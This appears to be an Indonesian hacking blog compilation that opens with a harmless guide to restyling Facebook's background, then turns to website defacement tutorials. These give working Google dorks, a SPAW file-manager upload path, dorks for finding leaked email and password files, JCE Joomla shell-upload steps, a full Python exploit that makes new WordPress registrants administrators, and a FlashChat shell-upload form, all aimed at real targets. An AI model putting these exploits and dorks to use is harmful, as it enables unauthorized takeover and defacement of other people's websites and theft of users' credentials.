CARA MERUBAH BACKGROUND FACEBOOK

Kali ini saya postingkan cara mengganti layout/latar facebook, Capek kali ya dengan background facebooknya yang itu-itu aja “putih biru”. huhu.. si Wong Pro udah penasaran nih :v
Yowes liat dlu ne contoh theme/background di bawah ini..... Mau sperti itu kan, pasti Dong..!! hehe… Langsung saja aplikasikan langkah langkah di bawah ini.

1. Pastikan anda sedang login di facebook
2. Download add on mozila atau klik link tersebut
    https://addons.mozilla.org/en-US/firefox/addon/stylish/
    Klik “Add to Firefox” setelah itu restart Firefox
3. Setelah Add on terinstal silahkan pilih tampilan facebook sobat klik link di bawah ini..!!
    http://userstyles.org/styles/browse/facebook

4. Klik install stylish pada samping kanan gmabar lalu Save
5. Silahkan lihat hasilnya Di facebook sobat

Nah itu dia Sob 5 langkan merubah background facebook, Mudahkan..??

Deface Website Dengan Teknik Spaw Upload Vulnerability

Deface Website Dengan Teknik Spaw Upload Vulnerability 

 

 Hello Sobat  Saya Akan Mengajari Tutorial Deface Dengan cara teknik tersebut ..

 maaf no SS :) Tanpa Basa Basi ..

Langkah :

1.Buka Om Google Masukin 

Dork :

inurl:”spaw2/uploads/files/” site:th

site:th bisa di ganti dengan negara yg agan mau deface :)

2.Ane Masukin Contoh Target ~> www.target.th/w3c/senate/spaw2/uploads/files/

3. Ganti  spaw2/uploads/files dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

4. upload file agan" ..

5. Nanti Kalo Sukses Di sebelah kanan ada bacaan download file , terus kalian harus click itu supaya tau link hasil defacean kalian ..

  Sekian Dari Saya ..

Hack Facebook Menggunakan search Google

Hack Facebook Menggunakan search Google 

Oke Kli Ini Saya Share Hack Fb Dengan Google Search Oke Gw Males Ngetik Langsung Saja Ya

1).Buka www.google.com 

2).Masukan Salah Satu Dork Di Bawah Ini

Dork:
1. intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "facebook"

2. intext:"email=" & intext:"pass=" & intext:"charset_test=" intext:@ymail.com | @gmail.com | @hotmail.com | @yahoo.co.id ext:txt "paypal passwd" 2013

3. ext:txt "username" "password" @ymail.com OR @yahoo.com OR @msn.com OR @gmail.com 2013 

4. filetype:txt & intext:"email=" & intext:"pass=" & intext:"charset_test=" 

5).Habis Search Google Buka Dehh 

Gk Usah Repot-Repot Buat Phising Segala Hahaha

 sumber:gca

Cara Deface Web Dengan Exploit JCE Joomla Extension

Cara Deface Web Dengan Exploit JCE Joomla Extension 

   Setelah lama saya tidak posting deface, kali ini saya akan share trik deface yang akhir - akhir ini menjadi trik yang sering digunakan para defacer, simak seperti apa trik ini.
 

Ada 2 cara yang dapat kita gunakan, yaitu dengan JCE Exploiter yang versi .exe & yang versi .php

JCE Exploiter Versi .exe

1. Download JCE Exploiternya disini

2. Selesai download, anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce
 
 
3. Silahkan anda test satu persatu web dari hasil dork apakah web tersebut vuln atau tidak dengan mencopy url webnya, yaitu : www.site.com

4. Buka JCE Exploiter yang tadi diunduh, lalu klik 2x pada JCE.exe

5. Jika vuln, maka akan keluar url/link shell anda di kolom bawah seperti ini

6. Anda copy link tersebut ke addressbar, maka akan muncul uploader untuk upload shell anda

7. Untuk membuka shellnya, tinggal rename url di bagian paling belakang, yaitu 3xp.php menjadi namashellanda.php

8. Maka muncul deh shell anda, eksekusi deh tuh web.

 
NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja


JCE Exploiter Versi .php

1. Download scriptnya disini

2. Selesai download, jangan dilupa diekstrak terlebih dahulu

 
3. Lalu anda upload file php tersebut pada web hosting anda/web hasil deface sebelumnya, atau anda bisa gunakan punya saya disini

 
4. Kemudian anda cari target yang vuln menggunakan dork :
inurl:index.php?option=com_jce

5. Nah anda isi deh kolom kolom kosong di JCE.php tadi
- Anda masukkan url target ke kolom "hostname", misal : www.site.com (tidak menggunakan http://)
- Anda masukkan path target ke kolom "path", misal : webnya www.site.com/v2/, maka pathnya /v2/ tapi jika tidak ada pathnya isi saja /
- "Please specify a file to upload" adalah untuk memilih shell anda yang akan diupload
- Kolom selanjutnya kosongi saja
 
6. Selanjutnya klik "start" dan proses exploitasi akan berjalan, jika berhasil maka dibawah akan muncul tulisan seperti ini

7. Nah anda copy link tersebut ke addressbar, maka shell kesayangan anda akan muncul. Silahkan deh dieksekusi.


NB : Jika tidak bisa mengupload file php, maka anda coba saja upload file html/txt alias tidak bisa upload shell, hanya upload script deface saja

Sumber : http://ramadhanlmzero.blogspot.com/2013/07/cara-deface-web-dengan-exploit-jce.html

Cara Deface Dengan Archin WordPress

Cara Deface Dengan Archin WordPress 

YeyeyeLalaalaala Wkwkwk Hey Ketemu Saya Lagi Broo Nihh Ane Mau Nunjukin Deface Dengan Teknik Archin Oke Langsung Saja Om Ke TKP

BAHAN:

-Kopi

-Camilan 

-python (Gk Punya Python Download Di Google Om )

saya Anggap ente Sudh Punya Python Langsung Saja Install python

# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access
# Date: Sept 29, 2012
# Exploit Author: bwall (@bwallHatesTwits)
# Vendor Homepage: http://themeforest.net/user/wptitans
# Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432
# Version: 3.2
# Tested on: Ubuntu
import httplib, urllib

#target site

site = "Targetnya Broo"

#path to ajax.php

url = "/wp-content/themes/GantiDengantema/hades_framework/option_panel/ajax.php"

def ChangeOption(site, url, option_name, option_value):

    params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})

    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}

    conn = httplib.HTTPConnection(site)

    conn.request("POST", url, params, headers)

    response = conn.getresponse()

    print response.status, response.reason

    data = response.read()

    print data

    conn.close()

   

ChangeOption(site, url, "admin_email", "emailmu")

ChangeOption(site, url, "users_can_register", "1")

ChangeOption(site, url, "default_role", "administrator")

print "Now register a new user, they are an administrator by default!"

save filenya dengan berekstensi .py Inget .py Jgn Yg Laen Wkwkwk

lalu cari target website dengan mengunakan dork berikut :

DORK:

/wp-content/themes/*/hades_framework/ 

 /wp-content/themes/felici/hades_framework/ 

 /wp-content/themes/averin/hades_framework/ 

 /wp-content/themes/shotzz/hades_framework/

 /wp-content/themes/KLR/hades_framework/

 /wp-content/themes/yvora/hades_framework/

 /wp-content/themes/ratius/hades_framework/

 /wp-content/themes/dagda/hades_framework/ 

 /wp-content/themes/shopsum/hades_framework/

 /wp-content/themes/ultrici/hades_framework/

 /wp-content/themes/bizniz/hades_framework/

 /wp-content/themes/appius/hades_framework/ 

 /wp-content/themes/majestics/hades_framework/

 /wp-content/themes/candy/hades_framework/

 /wp-content/themes/vithy/hades_framework/ 

 /wp-content/themes/sodales/hades_framework/

Lalu Coba Buka Misalnya Saya Tadi Pakek Dork /wp-content/themes/yvora/hades_framework/

Berarti Ntar Cek Sitenya Vuln Atau Tdk Dengan Cara http://site/wp-content/themes/yvora/hades_framework/option_panel/ajax.php/

Jika Target Tersebut Blnk/Kosong Berarti Web Berikut Vuln

Setelah Itu Buka Start ~> run ~> cmd

ketik "D:" (karena script yg diatas saya letakkan di local disk D)

ketik lagi "filenya.py" dan pencet enter. sehingga menjadi seperti ini :

Jika Sudah Seperti Itu Tandanya Berhasil Tinggal Register Dehh

http:/site.com/wp-login.php

Jika Sudah Registrasi Password Akan Terkirim Ke Email Tadi Cek Email Kamu Broo

Kalo Sudah Terserah Dehh Lo Apain Webnya Tapi Jgn Tebas Index.phpnya Index.phpnya Rename Aja Ganti Dengn Index.html Hargai Karya Orang

NB : Kami Tdk Bertanggung Jawab Atas Segala Hal Yg Anda Lakukan

sumber :GCA

 

 ~Deface dengan Flashchat

oke kali ini ane mau share deface dengan flashchat nemu di web GCA .. langsung aja

1).Buat File html Lalu Masukan Script Berikut

<form action="http://Target/forums/chat/upload.php" method="post"

enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>

2).Cari Target Pkek Dork : (Use Your Brain):p

3).Masukan Targetnya Ke File html Tadi :D

4).Lalu Upload ke Hosting Ato Pkek Xampp Klo Gw Pke XAMPP Truss Ada Kayak Uploader Upload Aja Shellnya

5).Klo Succes Akan Ada Tulisan Seperti Ini  ok-!@shellkmu.php

6).Tinggal Eksekusi Dehh Shelnya :D Untuk Letak shell       

  http://site.com/chat/temp/shellkamu.php

NB:JIKA TDK BISA TANAM SHELL LANGSUNG UPLOAD SCRIPT DEFACE ANDA